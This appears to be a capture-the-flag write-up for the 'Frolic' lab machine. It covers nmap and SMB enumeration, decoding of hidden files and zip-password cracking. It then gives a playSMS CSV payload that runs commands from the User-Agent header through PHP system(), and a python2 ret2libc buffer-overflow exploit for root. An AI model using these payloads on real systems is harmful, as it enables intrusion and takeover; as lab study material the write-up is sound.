Port Scan
# Nmap 7.93 scan initiated Thu Dec 15 09:06:29 2022 as: nmap -p- -A --min-rate 10000 -oN portscan.txt 10.10.10.111
Nmap scan report for 10.10.10.111
Host is up (0.26s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 877b912a0f11b6571ecb9f77cf35e221 (RSA)
| 256 b79b06ddc25e284478411e677d1eb762 (ECDSA)
|_ 256 21cf166d82a430c3c69cd738bab502b0 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
1880/tcp open http Node.js (Express middleware)
|_http-title: Node-RED
9999/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=12/15%OT=22%CT=1%CU=33070%PV=Y%DS=2%DC=T%G=Y%TM=639B2A
OS:26%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10C%TI=Z%CI=I%TS=8)SEQ(SP=
OS:108%GCD=1%ISR=10B%TI=Z%II=I%TS=8)SEQ(SP=108%GCD=1%ISR=10C%TI=Z%CI=I%II=I
OS:%TS=8)SEQ(SP=108%GCD=1%ISR=10B%TI=Z%TS=A)OPS(O1=M539ST11NW7%O2=M539ST11N
OS:W7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST11NW7%O6=M539ST11)WIN(W1=7120
OS:%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M539
OS:NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R
OS:=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=
OS:AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=
OS:40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID
OS:=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1h49m58s, deviation: 3h10m30s, median: 0s
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: frolic
| NetBIOS computer name: FROLIC\x00
| Domain name: \x00
| FQDN: frolic
|_ System time: 2022-12-15T19:37:25+05:30
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-12-15T14:07:26
|_ start_date: N/A
TRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 254.76 ms 10.10.14.1
2 254.86 ms 10.10.10.111
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 15 09:07:34 2022 -- 1 IP address (1 host up) scanned in 64.79 seconds
SMB
smbmap and smbclient both show nothing interesting, two shares, with no anonymous access:
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.111...
[+] IP: 10.10.10.111:445 Name: 10.10.10.111
Disk Permissions
---- -----------
print$ NO ACCESS
IPC$ NO ACCESS
root@kali# smbclient -N -L //10.10.10.111
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (frolic server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP FROLICNode-Red - TCP 1880
Web contents discovery
curl 10.10.10.111:9999/dev/backup/
/playsmsplaysms
String decryption
admin
success.html
ook decryption
/asdiSIAJJ0QWE9JAS
curl -s http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/
UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB
BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs
K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve
EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj
lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC
AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG
AAAAAAEAAQBPAAAAAwEAAAAAIt like a zip file
curl -s http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ | base64 -d | xxd
00000000: 504b 0304 1400 0900 0800 c389 374d 23fe PK..........7M#.
00000010: 5b14 b000 0000 6902 0000 0900 1c00 696e [.....i.......in
00000020: 6465 782e 7068 7055 5409 0003 857c a75b dex.phpUT....|.[
00000030: 857c a75b 7578 0b00 0104 0000 0000 0400 .|.[ux..........
00000040: 0000 005e 44e6 104a 9f73 b268 8a29 9a1b ...^D..J.s.h.)..
00000050: 9550 f06e 0ba9 bf53 73e4 024a 771a 11dc .P.n...Ss..Jw...
00000060: 8ee5 a034 e2f6 d98f 6bee 7ad0 128a 55c8 ...4....k.z...U.
00000070: 96ec 2b58 ba7f e050 c8e1 12e1 b687 a4ea ..+X...P........
00000080: d0bb e278 5f13 c04e 895b fd8d 8453 aaea ...x_..N.[...S..
00000090: 38f2 83f2 e20f 914a 3253 c72a 8303 44d0 8......J2S.*..D.
000000a0: 8d7d 9338 6454 0e51 026b de10 cad7 e3e4 .}.8dT.Q.k......
000000b0: fb6a 5f9f 8bf9 18e9 94c0 2778 7f63 90c2 .j_.......'x.c..
000000c0: 16dd 8f74 beb2 3735 51ac 0b9a 8a03 0e95 ...t..75Q.......
000000d0: 106b 032c 34b5 d962 29be 3446 b5e9 0609 .k.,4..b).4F....
000000e0: ffba 84e3 96ea e9ef c726 7132 6f88 57d4 .........&q2o.W.
000000f0: 9ce3 3950 4b07 0823 fe5b 14b0 0000 0069 ..9PK..#.[.....i
00000100: 0200 0050 4b01 021e 0314 0009 0008 00c3 ...PK...........
00000110: 8937 4d23 fe5b 14b0 0000 0069 0200 0009 .7M#.[.....i....
00000120: 0018 0000 0000 0001 0000 00a4 8100 0000 ................
00000130: 0069 6e64 6578 2e70 6870 5554 0500 0385 .index.phpUT....
00000140: 7ca7 5b75 780b 0001 0400 0000 0004 0000 |.[ux...........
00000150: 0000 504b 0506 0000 0000 0100 0100 4f00 ..PK..........O.
00000160: 0000 0301 0000 0000 ........curl -s http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ | base64 -d > index.php.zip
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt index.php.zip
password: password
index.php
cat index.php
4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0aUse xxd to read that back to bytes, which happens to be not only ASCII, but base64 characters:
cat index.php | xxd -r -p
KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==There are some \r\n in there that will screw up base64. I’ll remove them, and decode:
cat index.php | xxd -r -p | tr -d '\r\n' | base64 -d
+++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+
++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->---
<]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]>
++..<
www-data shell
Public vulnerbility in playsms
https://www.exploit-db.com/exploits/42044/
book.csv
Name,Mobile,Email,Group code,Tags
<?php $t=$_SERVER['HTTP_USER_AGENT']; system($t); ?>,2,,,
Priv escalation
Transfer the binary with nc
We can use gdb to observe the binary, and I find the vulnable function.
It will be overflowed if we input more the 0x30 characters when we attack the binary.
Locate the offset
Check what libversion in the machine. We can find the function basic offset.
# python2
import struct
offset = 52
elf_address = 0xb7e19000
system_addr = elf_address + 0x0003ada0
exit_addr = elf_address + 0x0002e9d0
str_bin_sh = elf_address + 0x15ba0b
# print('system_addr: ' + system_addr)
# print('exit_addr: ' + elf_address)
# print('str_bin_sh' + str_bin_sh)
payload = (offset)*'A' + struct.pack('I',system_addr) + struct.pack('I',exit_addr) + struct.pack('I',str_bin_sh)
print(payload)
we can redirect the output to the file.
upload the payload, and run the rop with $(cat payload)